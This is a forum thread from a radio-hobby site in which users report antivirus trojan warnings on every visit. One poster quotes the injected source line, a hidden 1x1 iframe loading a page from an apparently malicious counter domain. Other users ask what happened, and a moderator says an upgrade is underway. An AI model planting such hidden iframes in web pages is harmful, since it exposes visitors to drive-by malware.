• You can now help support WorldwideDX when you shop on Amazon at no additional cost to you! Simply follow this Shop on Amazon link first and a portion of any purchase is sent to WorldwideDX to help with site costs.

ATTN MODS...........

frmboybuck

***** medic
Apr 3, 2005
Iowa
Everytime seems to be some bugs in the system this morning. When I come here and here only I get a pop up from my comp that says a trojan has been removed from my comp. I get it everytime I come to the forum....Just FYI

Same thing happened to me, but this thing infected one of my virus protection programs so I cannot update it making it worthless so to speak. Now every time I make a move in WWRF my AGV has to go thru loops to detect and remove this thing. I see it on my system while loading WWRF and it is "all1counter.net". I emailed Moleculo a question if they had added a new counter feature to this site, but have not received an answer.

Should not be hard to find, it is in the first line of your source code.

<iframe src='http://all1count.net/adv/020/new.php' width=1 height=1></iframe><?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">

My anti-virus software was actually blocking out this web site both Saturday and Sunday. I received a warning that this web site was a computer system security risk, that it would infect my computer with Adware, Malware and Trojans.

What happened ?

That must have been a damned good disturbance !! Doesn't look like there has been much posting since last Friday the 27TH and before that. I surely couldn't get on myself ! Looks like Marconi got the just of it ........something tells me you weren't alone dude !! I wouldn't mind having this explained to me and why and how it got cleaned up ?? Congrats !! on getting it back up and going !!

Well SK, it is either my computer or the forum is still working kind of strange, at least for me. At some point after I noticed this problem the loading problem with "all1count.net" seemed to go away. Then earlier today my security software started responding with virus responses while visiting WWRF again.

It does appear that there has been little activity on the forum since this started and I can't be for sure, but I have the feeling that the updating we normally see when we return to the site is not working right. I see an update flag for a topic on the front page, but when I open the topic there is no flag there. At one point I tried to respond to a comment in a thread and clicked on 'Post a Response' and my computer just sat there doing nothing. I had to 'X' out of the forum to get control back.
This is probably my computer, but it all started with this problem on WWRF.

It would be nice to have a progress report from the guys, right?

There will be an upgrade going on shortly, currently we're running a slightly older version and needs an ugrade especially after this week, it's being worked on, just slowed a little since Moleculo is out of town with limited access to the internet...

be patient grasshoppa....

its under control

well , wish I understood more when it comes to the internet and how it all works ? This "older" version (whatever the hell that is ?) seems to be working well for me . The only thing I notice that doesn't work is the Img's and URL's . (pictures and links) Like I said before , I'd really like to know what caused all this to begin with ? If it was something that one person did in his or her evil ways ? , I'd say they did more then a good job of it !! the more I tried at getting on , the more I failed , my virus protection and other software took care of things for me (or so it would seem) but the way it was for me , this site was basically SHUT DOWN ! in a not so very nice way. Hope somebody can explain this and why ? Grasshopper would like to know what's going on with those marbles ? :p

dxChat
Help Users
  • No one is chatting at the moment.